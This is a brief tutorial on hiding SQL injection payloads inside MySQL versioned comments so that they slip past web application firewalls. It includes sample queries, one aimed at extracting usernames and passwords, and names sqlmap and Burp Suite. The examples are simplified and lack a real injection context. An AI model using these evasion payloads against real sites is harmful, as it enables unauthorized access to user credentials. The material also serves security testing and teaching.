Conditional Comments

Context

This article explores the utilization of conditional comments in MySQL as a technique to bypass Web Application Firewalls (WAFs) during SQL injection attacks. Readers should have a foundational understanding of SQL comment types, how WAFs function to block malicious requests, and prior experience with MySQL WAF bypass techniques.

Theory

MySQL Conditional Comments

In MySQL, conditional comments are a unique feature where comments can be made to execute as SQL code, but only if the database server version matches the specified version or is higher. This capability is leveraged by attackers to obfuscate SQL queries, making it difficult for WAFs to detect and block potentially malicious SQL inputs.

Versioned Comments Syntax

MySQL's conditional comments use a specific syntax to embed SQL code within comments. The syntax is:

/*!version_number SQL_statement */

The version_number specifies the minimum MySQL server version at which the code should be executed. This allows attackers to insert comments into queries that might bypass security filters by exploiting version-specific parsing or execution contexts.

Obfuscation Techniques

Conditional comments serve as an obfuscation strategy against WAFs. Since WAFs are configured to detect and block harmful SQL patterns, embedding SQL logic within comments can trick basic WAF configurations into allowing these queries. The underlying logic is that many WAFs do not fully parse or interpret SQL comments, especially when disguised as innocuous code based on version checks.

Practice

Using Conditional Comments for WAF Bypass

Here's a step-by-step guide to using MySQL conditional comments to bypass a WAF at an SQL injection point:

  1. Identify the SQL Injection Point: Begin by identifying the SQL input field or parameter in the web application that is vulnerable to SQL injection. Use tools like Burp Suite to analyze and locate these points.

  2. Execute a Test Query with Conditional Comments:

    SELECT /*!50000 1,2,3*/ FROM users WHERE id=1;

    Inject this query and observe the behavior. The use of /*!50000 1,2,3*/ instructs the MySQL server to execute the logic if its version is 5.0.0 or higher. If the WAF allows this query, it is an indicator that the conditional comments successfully bypassed WAF filtering.

  3. Test a Malicious Query with Conditional Comments:

    SELECT /*!50000 username,password*/ FROM users WHERE id=1;

    Use this query to attempt extracting sensitive information by embedding the critical SQL columns within conditional comments to assess whether it bypasses WAF detection mechanisms.

Outcome

Successful execution of these steps should result in bypassing some input validation and detection mechanisms set by the WAF, potentially allowing unauthorized access to sensitive data if appropriate security measures are not in place.

Tools

  • sqlmap
  • Burp Suite

These tools can facilitate the discovery and exploitation of SQL injection points, and the automation of WAF bypass using customized SQL queries embedded with conditional comments.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.